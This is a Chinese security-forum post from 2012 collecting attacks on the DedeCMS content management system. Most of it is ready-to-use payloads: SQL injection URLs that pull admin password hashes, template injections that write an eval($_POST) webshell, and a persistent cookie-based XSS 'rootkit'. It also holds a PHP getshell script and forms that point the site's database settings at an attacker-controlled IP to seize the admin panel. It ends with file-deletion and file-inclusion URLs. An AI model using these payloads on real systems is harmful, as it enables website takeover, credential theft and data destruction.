找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3187|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

/ [0 N8 r) O6 ?Dedecms 5.6 rss注入漏洞
: g0 }! H+ d: }9 G3 ~3 S
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1& G" `- r: e4 ?

) l5 r. z% U3 ~. m- m" r, r# L% L$ p" X
" u. w( Z: I- ]: ]; G. Y* G3 ?3 b1 u8 |$ Q

+ T7 s. c1 Z# Y2 G3 d/ q6 i# [  K8 f% Q# L% j
' b8 Y8 _# s) X* X, c% d0 ]9 y

: Z7 N6 h0 D) ~# A8 |$ s" h$ k1 s1 @5 Q
DedeCms v5.6 嵌入恶意代码执行漏洞
" K0 z% G6 C. O, D$ _' |! f2 m注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}7 F; R3 b  K' L" [3 @, l2 k& B
发表后查看或修改即可执行
1 Q# \! D( b/ F" z, ma{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}9 V1 j1 f7 d9 w, @4 m" C4 j% f
生成x.php 密码xiao,直接生成一句话。
4 `: G, F. c* [  F
* {( ?) a5 S( v" R! G1 [( O0 ^7 g; |) p3 }- r2 D. q* ?/ x

; ^2 d! U4 y+ S  [. ]) Z$ g  s% g; R, A$ |+ T; a6 p% U5 }

! D2 i9 P) l) D( E" s' v4 M
# F2 l  R# u# O; |0 l/ Q' X
* l. ]* [2 v/ f' x" E9 z; B( b. W3 p6 W8 i7 s
Dede 5.6 GBK SQL注入漏洞
( k/ H! \. L* F
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';( R1 A  [- T5 s2 ~. p; K6 J
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
+ }( P- U+ a- c# j2 d% e: h. a+ yhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7( z! O/ k. `! b: P/ M# h; T

7 [# c9 k# x4 j# |7 f
! P; K" `1 ]. ]9 B6 p6 i; u5 W5 Q+ \% t6 x/ {9 X
0 ?* _: \% ]5 Y# K9 A$ H2 n

. @2 M( O) g; {+ F/ [6 |: x& e4 l6 Y1 y) i4 L
. c8 ~* H9 V6 _! L" {0 a6 Y$ C1 q) i7 Y7 G

4 D5 ?- Q9 M" x3 T, h6 J, x6 mDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
/ q) Q1 @& M# A# S
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 }# H% C2 t0 Q; q) O1 u& p( o5 `  Z+ {

! S  Y9 s- h1 V4 T$ H' T9 h- G8 o6 Z! l* S, x5 }+ l' D
2 M) Y3 r- j. k+ }4 s7 ]5 m" D

# n3 j# a2 x4 B6 W& W9 m' n' F; l! P* g
DEDECMS 全版本 gotopage变量XSS漏洞
4 @& F9 X( g/ h  i) e1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 1 P* K7 O6 v6 Q/ g0 r- y- S
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
/ O1 Y: v! a0 c& }0 R6 R# r& z1 ]+ A
, v+ Z$ |. R  T2 J& J
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 1 ]4 u( i, U0 k: z5 O6 @
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
4 e" s) ?5 Q" k! v( B0 a' j( H6 M4 C. x% X
% q" t" i- F& d) s
http://v57.demo.dedecms.com/dede/login.php8 e5 F6 N& K! G& U& B& n% _, z
3 r, E1 F% T4 k) B- G- G2 e5 Z
. G$ a( a2 C& l7 g8 }2 X  y
color=Red]DeDeCMS(织梦)变量覆盖getshell
" c1 n) P0 o0 \3 f$ F2 k* z' D#!usr/bin/php -w" p  I( o2 g! j. N' N
<?php
& F) L6 T: n* Yerror_reporting(E_ERROR);
; I- V( ~2 j9 b* v" Y8 p8 rset_time_limit(0);/ ?' d: ~+ p6 A0 l1 `
print_r('
! j! R" P! b- r/ ?+ e4 v2 ZDEDEcms Variable Coverage
) e( b) y- {) D" Q; ^Exploit Author:
www.heixiaozi.comwww.webvul.com
* a" y; G! \7 @: P) O( j/ J* v+ C);
* z0 |% L" T- @  y0 u6 s) ]echo "\r\n";
( r. q0 @5 Z: z5 r! c# Xif($argv[2]==null){
5 Y0 K$ R7 W# ^- J+ c2 @& \; {print_r(', J4 o7 c% S) S
+---------------------------------------------------------------------------+  ]1 m" f) R3 _4 p' q
Usage: php '.$argv[0].' url aid path
7 b5 c& p( K. b( F/ ?aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/. S; |/ o! W8 K9 R. E
Example:
/ _; j6 F& p- M5 I: ~1 z+ y8 Hphp '.$argv[0].'
www.site.com 1 old
8 f/ _3 g' F" n  X1 T) h) [+---------------------------------------------------------------------------+1 }8 {! t3 Q% f) R4 Q
');# a5 e0 {. U$ A5 q" b& P
exit;
3 n* f* C3 {) s! m, Y% x}  {) {$ U' [( s; F( J
$url=$argv[1];
6 N* e& }, k6 q( _) o0 h  P1 F* D$aid=$argv[2];
- I3 r# S* d5 S$path=$argv[3];# O9 N7 i* L) H% K8 ]. w& S
$exp=Getshell($url,$aid,$path);1 p. m& H& n4 K' {' C" M
if (strpos($exp,"OK")>12){) W. n: s) D7 R  _
echo "9 K& X$ }! }( n: F$ x; v. X
Exploit Success \n";
, W  [  V9 h) t4 q  oif($aid==1)echo "4 g# R/ [* b4 `% G: N/ U- i
Shell:".$url."/$path/data/cache/fuck.php\n" ;7 i5 t+ X; \; x- f

# u% M) c& t8 D: v+ B; ~  @3 [8 y0 @* d% E& r
if($aid==2)echo "
; J/ w& L% n* u! R% {; UShell:".$url."/$path/fuck.php\n" ;1 m7 A2 b4 e3 z  |6 R
* g* _  G8 v; ~0 ]
* A- d  O. E$ q" `+ R9 ]1 B
if($aid==3)echo "
1 t: G) X+ h1 a1 BShell:".$url."/$path/plus/fuck.php\n";. |, d, N# d/ o3 d1 Z9 ]( k; R

1 f! s' V. R+ D- L$ Y& \6 ?/ r7 Q4 u' l1 |( }# F
}else{7 n. P' K; X/ j0 Q! o
echo "# u( z. [0 P/ D: \$ A, T$ o3 D
Exploit Failed \n";4 N& v; T3 v; e; k
}
6 U4 i3 Q) N0 ]$ hfunction Getshell($url,$aid,$path){
: {: V  ~, \  |3 _% P$id=$aid;6 W+ U/ u1 D) I3 E0 ?. i: {' O
$host=$url;# g6 L) u( h/ O
$port="80";3 w1 T3 ?2 f  E7 m
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";# u% E& v/ Z0 o8 P; [* J
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";3 j4 n0 l! k. p# L4 l/ y0 P
$data .= "Host: ".$host."\r\n";. X# y7 N2 i% `
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";; D2 d' ]- l9 \2 g8 O
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";1 [1 i+ w" S( Y1 v) d
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";- a& `# m9 z6 c- I
//$data .= "Accept-Encoding: gzip,deflate\r\n";' W7 v. S# m: Z+ \
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
1 x4 Q% Z% ]  h2 O2 K& e$data .= "Connection: keep-alive\r\n";
/ }( M& q/ V+ W2 W2 @$data .= "Content-Type: application/x-www-form-urlencoded\r\n";" s& M6 ~; [: q- N% T! u/ z' H
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";* C5 @9 ^% M: Y7 a
$data .= $content."\r\n";3 ?1 x6 M! R4 c& ?* C! O& K2 h5 o
$ock=fsockopen($host,$port);7 {6 C4 |9 K- f: q8 G7 ~
if (!$ock) {2 \* G5 q, D2 u" N' X4 m" n( ~3 q
echo "8 P& O( L  m* ]1 u
No response from ".$host."\n";
0 a- a; k8 J7 y1 s5 h}
' i5 @# I3 S" }6 x4 h; o( Wfwrite($ock,$data);! h) o3 N* S( O1 Y0 t0 w
while (!feof($ock)) {
! k* T4 G  [1 D4 L5 n$exp=fgets($ock, 1024);
' ~( U! A! D; Q& y) G& Lreturn $exp;
: T' [: k1 L6 [8 x) e* x4 X}$ o; \  K, @; e, @8 a
}0 r! F% ^2 ~& e4 E

/ s- M' e7 h3 g, M1 G' V: s( n& F
2 m7 F  L' b( d7 ^/ c?>, X, g# Y# y3 k1 _3 E
7 C/ D) \/ S9 s$ a! ^
/ x9 i8 D6 G3 b+ j! i: W- s- {

8 z6 @# Q( B, K% z: g) q2 b" m0 j) Z) \# w2 t$ s: }# ]

1 s' g+ z2 J# O8 n4 R9 l, Y, M: I7 z5 b8 O# D& i; @0 Z# Q/ q. g; f

* ^3 V' _3 E/ f7 {/ Z
% p5 e+ W' h7 d* w/ N
2 f+ _+ |! W3 d8 t) U& J) g
' t0 w0 K# d0 f+ gDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
, M' x' m# F. i0 M+ _
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root0 o6 @3 F+ r( y* t4 p/ [+ |9 g
5 ]' m" I9 v; [4 ~4 L/ e" U

$ S( G' {8 T: r1 Q* @! h9 M) @把上面validate=dcug改为当前的验证码,即可直接进入网站后台
* ~+ [+ d7 v' Q# P" ^, n- e# g* A( h  A

! c+ P4 v8 q" D* Y此漏洞的前提是必须得到后台路径才能实现
: e* A+ [' }* N- m' ?- B/ X) ^& r- w+ i  Q( W- A

6 V/ ~! p" |) v. E
# y8 ]1 H: q3 ]8 o4 B2 P# ?- a, \: o- m3 o7 R. q5 Z( j; A4 Z

0 v; e* E# W- o0 z  s
8 O- o9 H, C, b7 J0 t8 w) Y6 V3 U" v& _! B* T% }6 C

1 L5 u& x3 Y7 k0 o/ [; D" @1 x* u$ {6 Q1 b/ K0 t$ ?

  t( d4 O7 j( W9 Q4 gDedecms织梦 标签远程文件写入漏洞0 ^& D2 g# M1 x- M/ X
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');6 Y% ^  y5 i. N
2 }3 I8 r8 k  p4 h# J
, w, u' a3 Q) ]
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
8 a5 N; j. S- a" n2 H, M  d<form action="" method="post" name="QuickSearch" id="QuickSearch">
& }! R% j$ ~6 H5 @( S; X<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' ]1 z! h! V4 M0 j) \3 N2 d' E# Y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
2 ~2 ]/ X. Q, c4 L<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /># }& e9 `" _: L' [4 b, m) m5 g: Y
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />! ?2 V) U. B- S( h2 A: v8 E
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 ^8 @: C' L$ X2 ]! T<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( r4 t  s% T; Y( y6 U% J: M1 K
<input type="text" value="true" name="nocache" style="width:400">/ H$ a  c2 I& B/ {+ ~) H- Y7 p5 k
<input type="submit" value="提交" name="QuickSearchBtn"><br />8 f5 L- E* o" I% Q6 h5 x" d( _
</form>& |. I. U; B3 p
<script>
8 j: |* y) B+ X9 g: ~" ]function addaction()* }0 p2 o1 |7 z
{
3 N/ i8 U; @1 a% x- F: \document.QuickSearch.action=document.QuickSearch.doaction.value;
; c7 E5 f4 R# T* y1 e}4 X9 D3 `9 O+ E1 D  c8 U
</script>
5 J+ J/ n5 |$ u& g; b* y2 x7 H. |* k: u

; E& \% n( v  B( E$ Q2 W$ n0 y! ?" x

3 W' \- h/ o$ l3 p( |, U7 |. G6 @8 W3 B) q6 }6 {  I

7 O# c7 r2 j' Y" B5 P" x4 m) e2 r4 J7 m9 k7 U  d8 z) Q- ]

' k  F2 s- Y# c$ ^9 Y6 a/ Z9 N( @2 }# G, }/ V( x; A/ n

  Y9 R) j; D& N& u% F" B4 u7 ADedeCms v5.6 嵌入恶意代码执行漏洞. N  U5 z# }, v; j4 n4 x, o. ~
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行+ O" z. b4 Q( o( q$ u, I
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}; s5 l0 Q0 F, c  x4 |- C
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得1 G( t/ Y1 i* \
Dedecms <= V5.6 Final模板执行漏洞0 [; k- C3 v: M
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:' R9 s& o# [6 I1 o2 Y+ ^, W
uploads/userup/2/12OMX04-15A.jpg& s; l, M' c# h
$ E; M- [7 _; q5 o' W
. u( S$ s& W. u: t
模板内容是(如果限制图片格式,加gif89a):
8 q" A9 m" D2 Z" T7 f* B1 a" x{dede:name runphp='yes'}" V# ]! E5 c  A9 s$ a% {- f" [
$fp = @fopen("1.php", 'a');
7 P6 o) O: J! B2 O4 _@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");) v* c1 q2 N6 i+ N( n/ D4 z8 j) G5 }
@fclose($fp);
3 g" {# `( w9 S+ ]$ k+ S) S; `{/dede:name}
- [( l) D% U$ O; v' M' I2 修改刚刚发表的文章,查看源文件,构造一个表单:3 `% G  v6 Y4 P5 T
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
4 O, K7 V" Z7 x: j2 S& T<input type="hidden" name="dopost" value="save" />- C' F* z, A6 b. L. W  W/ x3 w
<input type="hidden" name="aid" value="2" />* ^1 f$ }9 R2 \% I6 }; S& f
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
7 P( N- V$ p% I+ o) k( |; C<input type="hidden" name="channelid" value="1" />& x+ q. ?) t% q" H
<input type="hidden" name="oldlitpic" value="" />
3 `8 O( J5 `9 ^! ]8 T* a<input type="hidden" name="sortrank" value="1275972263" />
$ l% q3 w% T! j9 y! ^, p: K; g8 b" a" H# x1 w7 E+ g
- ?; A9 b2 F! h4 \
<div id="mainCp">
% M7 Z# B; X1 o  a/ e$ I2 y  E<h3 class="meTitle"><strong>修改文章</strong></h3>3 u+ z- z8 t% X4 O1 l! o8 p

8 f' t" R5 T2 v9 T7 C0 J8 a% c. U- Y$ u5 Z6 I4 [2 s: `- w
<div class="postForm"># ?" O0 z& R9 D' t- `& `0 z( q
<label>标题:</label>+ a  p+ \' W! n* [$ o: H" x
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>, T& T: C5 s4 k  o& O2 N! i+ P
! j1 E3 ]6 s$ B2 ^
( |3 ?) R, L$ I
<label>标签TAG:</label>3 j7 F/ @9 B$ a
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
& \) s; M- v8 \* I9 s, Y! _
2 @0 _5 I( c4 D4 T: _4 C! a2 b& U( a0 r2 I
<label>作者:</label>0 T2 F4 V9 m- u- }
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, B) }; H6 w' @' e8 _( _
+ e5 e9 O) D% B6 S  T6 ?- u% u

. P4 V2 H1 |, Z$ }<label>隶属栏目:</label>: }# z9 ^0 G9 H( g
<select name='typeid' size='1'>
, B$ c* O# Y9 ]- _: i2 a( C<option value='1' class='option3' selected=''>测试栏目</option>
. P& X0 m4 k: b1 ?</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)% [( `  W: e* X9 s8 S, m
+ L- X; `- G& p! s7 `+ {3 z4 ~& I
/ q" w- k/ K+ @+ U
<label>我的分类:</label>
& r. p( |# S& d, l) i5 ~3 c' ]<select name='mtypesid' size='1'>2 ^% I8 F: J) D8 W2 f7 Q8 U
<option value='0' selected>请选择分类...</option>
! e' z' P  Z3 G; y& w/ p<option value='1' class='option3' selected>hahahha</option>5 d. K, _; |+ H7 T
</select>! v$ u2 U9 Y3 w, [0 p
' Q* P$ b: R8 W9 V+ Y$ d9 ~# E

" b/ [0 r0 p9 j<label>信息摘要:</label>
+ c  m# B/ h! \+ y; [& U0 x<textarea name="description" id="description">1111111</textarea>
, t" S5 b& e! o6 N/ a( I(内容的简要说明)
+ E5 t) D2 \4 l% c! K. h9 p7 Z
$ X: H8 Y* D. e! g9 Y- \+ q' |6 k& N3 s
<label>缩略图:</label>
2 Z. u2 u8 P5 A) n, L. j! c3 i" I<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>* _4 ^6 E! N( S' }2 t0 O' ?
: Y4 i- @" I0 z" n* o2 z

+ o0 d# ~- p8 G2 z, w( F: ~<input type='text' name='templet'
1 \2 ]5 o8 r7 D' T- Mvalue="../ uploads/userup/2/12OMX04-15A.jpg">
0 O1 ~0 K4 h2 z/ N<input type='text' name='dede_addonfields'9 x: O" t& ?! A9 g
value="templet,htmltext;">(这里构造)9 \- a, Z, g9 _+ h
</div>8 m& f. }  D% S

5 d' C+ m/ M% h; Q2 g2 I, z% f# Q! I; b* J, ?
<!-- 表单操作区域 -->
9 {, v% l7 R8 z6 t5 ^' s<h3 class="meTitle">详细内容</h3>
! `& C5 v  `& Y3 a. W" a
5 Q3 K. I6 w) R- Z: j( T5 u* m; u
+ M0 ?- m4 y$ T# f3 X<div class="contentShow postForm">
8 v9 }* k0 h  E: Q$ v4 z( G# Z<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>" M4 E5 `/ k7 K+ I

& l, E' u  H; w/ n& R7 i9 Y2 v/ ~
+ M, F! v6 Q1 s6 h<label>验证码:</label>
, Y: |, P1 p! U3 |8 N0 S& y<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
; _; g0 J' H& z6 Q<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />: U" `6 N, o* d7 V. k3 c

; R/ p. G6 n$ _& V
, l0 j" e. ~9 ^' }<button class="button2" type="submit">提交</button>
. L% }3 A6 ?, E& n- J7 D- Z! q<button class="button2 ml10" type="reset">重置</button>
- O( E5 ]$ `! d% z2 q$ y$ B</div>, K8 s0 B# J; S5 S  F0 A8 R& B

! V  y9 F1 X5 Z, P. v- ?* s
4 t. t, F# K* ]- B/ @</div>
& T7 j8 C! E6 Z
1 W6 e5 p- d( X% u/ D- g7 e0 ^
8 Y  N/ j( ~$ L& D! T/ b</form>( J/ R" q% Z8 U  A
8 z- l/ W8 W) t7 _# Y3 I$ I
( l9 X! z1 c5 O/ r  }
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
3 M' h" }6 B0 Z* C假设刚刚修改的文章的aid为2,则我们只需要访问:
, h: u0 Z, _1 W
http://127.0.0.1/dede/plus/view.php?aid=2; i' r3 N- X: e* K/ M* r; n7 t
即可以在plus目录下生成webshell:1.php) l/ A2 g+ M. M
% m8 W- e1 {# ~6 c5 ~  Z# R
5 Q! ]; V) q- x7 s+ L
/ C# R+ h3 o3 W  W# ?
  u# G, z( g+ `5 n( N2 d

! s. \& e" v7 ]( N
8 Q& ?0 v/ k- A& d9 z6 U
2 T* t6 X" N# g* W1 o, M/ d1 `( d) ]
( L: z6 M5 p8 p8 n7 }& s( c& e( y  N# u3 c4 a

/ ^/ W/ W& M& X& o/ ~$ N# b% p' j$ E1 V- j& O! b% C

) |) K0 \. R3 R  RDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)6 ~/ g: _- I3 I6 R/ ?
Gif89a{dede:field name='toby57' runphp='yes'}
* L7 z9 S/ y7 Yphpinfo();
; p7 K: C8 |4 a6 N6 `{/dede:field}
6 @& k1 B0 a2 t! X# A! _* V; n3 G保存为1.gif8 T* S, O7 H/ g, ~) U
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ; m- _* E* D2 r2 J1 w
<input type="hidden" name="aid" value="7" /> 3 h7 `: i8 W8 y
<input type="hidden" name="mediatype" value="1" />
( u; G( ]% \! ]9 R5 j/ ~2 h<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 1 U: S1 q. y4 \' ]7 G
<input type="hidden" name="dopost" value="save" />   X' X. c0 |0 u) }! p8 u4 ?4 X
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ; I9 |2 @( k% D
<input name="addonfile" type="file" id="addonfile"/>
5 p8 b4 r4 t) D6 ^<button class="button2" type="submit" >更改</button>
) p4 W) P/ x' e  F) K</form>
" B) g9 ~& \. y" G+ x8 @, w6 F$ k# A2 F" K

1 d5 z' I; |7 D- w$ n" ?: J构造如上表单,上传后图片保存为/uploads/userup/3/1.gif; ^1 b7 k: T" u% g0 J, B8 f3 a
发表文章,然后构造修改表单如下:
+ \- v) ~: [( D: ~& v( Z% m. ^/ R. t4 }
- |% l) _0 X+ N* G/ Q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> - c, `3 \) v# J9 r+ N; {  Z) P
<input type="hidden" name="dopost" value="save" />
* ^* z; a# v5 o4 R5 v<input type="hidden" name="aid" value="2" /> . S6 Y" `! L: U4 s2 z* e# A3 _+ p
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 0 U. k% u) L7 J+ \6 S+ H5 _
<input type="hidden" name="channelid" value="1" /> & S9 `' ^& p. z+ T
<input type="hidden" name="oldlitpic" value="" />
" i9 A% N% [$ [$ j<input type="hidden" name="sortrank" value="1282049150" />
% h# x$ I% L8 r- _/ X  _<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> % L) d. T1 w6 V, t+ Y& B4 W
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
# v( \5 n4 p0 l8 _8 v<select name='typeid' size='1'>
6 C' V  d# l: k+ E" j& |5 ~5 q<option value='1' class='option3' selected=''>Test</option>
; ]' S  B( D# o* A# V# I. g) @* r<select name='mtypesid' size='1'>
. w  x( H. W: J) s0 T  x<option value='0' selected>请选择分类...</option> - W: }/ J$ V" H+ P* [7 c" I8 m# u  s; ~
<option value='1' class='option3' selected>aa</option></select>
: F2 c( @# D0 q! W! U1 F$ m; t<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
% t4 Z' S$ Q- b- D! \* G<input type='hidden' name='dede_addonfields' value="templet"> 2 w$ s$ f$ }2 N* {0 z
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ( d6 B( J+ J- k0 t2 J
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 7 o! a' f+ l2 _3 B$ \- P' M. t2 b
<button class="button2" type="submit">提交</button>
. ^7 h7 c. d$ U8 C$ N# K2 Q9 i5 D</form>
1 u$ O6 v! R5 U8 @. |
! f# _2 i5 ^8 }8 r1 M7 ]& g! F7 A' [2 v2 p0 \4 H' B3 `6 O

6 U! h2 c# ^4 u8 ^0 }5 l8 d' E; i/ J9 r3 V
. C/ i) I( P* t

8 K! y* t1 C6 v; e
! N# q5 B. s' f$ ]$ L/ \6 l0 J
; \- N" L# V" G& J# D6 w- v  x  ~
# S  M" ?; B" v( w* o! w' r/ {/ P4 B, T9 d7 F9 G
) a- H, o+ P/ U) O3 g, Q, S( U
- d( q6 k9 Z8 i9 P6 k4 ]
织梦(Dedecms)V5.6 远程文件删除漏洞: W6 }/ a! h% C* ~
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
! x4 m& b/ e% B9 f9 ]( u
% l% B  v- v. E' e* C* N) z
5 z/ O( T" |" H+ A) e. [* ^3 l# W8 n  o' C5 S$ X& ?5 ~; P
0 ^: J# w8 X( D. a4 E8 x( [

# [- I5 I( c, ?: T( I/ b6 d- ]4 n  O! A

9 Z6 y, \4 x0 [. J0 K" K6 K  e$ Y3 E+ X0 c0 P3 D0 K: U

* b/ l6 s  t3 z: T$ r  s5 k* ^
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 3 c/ ?7 h! D/ Y6 l0 H( S! @8 p
http://www.test.com/plus/carbuya ... urn&code=../../
# T! G% c8 `1 G# D/ E' t" W7 V9 a- G9 V- S) X; f8 Y2 e( O" V; x& O, Q

- C0 V% y+ T" q& z/ C
, T3 m# G2 g; ?7 e) {7 {9 c& f* A/ t' F8 n
# T- T& m& B* o* o% l$ f+ [

, q  f6 G$ w. P9 H( d# i, c. q% @% W3 N

# Q( N  M9 H* w( b
& m8 l3 R. R" H' g) r6 \2 w7 y( x! n" `1 \2 q- S5 W" Y
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 . Y9 X* e7 V$ |6 w3 i( m6 X
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`$ R8 X3 s9 G4 c
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5+ D6 ?) F( g  y& }1 t" [

$ {& S# b' }: a# t2 `
! M& K& m' a3 @$ f% S. w" [3 S; E7 x# {
: g) R8 N) B3 L0 q( ^) b8 |/ H- P* F
# H7 S5 j8 J- j- g0 U

- d4 R4 o& n: H. L' |  n$ J, k" e0 a  o

1 U  P7 x6 Q' ^6 {3 y8 q" f+ y9 g
: ~) u* f! Q2 a8 T
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞% o2 `: y; ]5 W: ]* n/ X
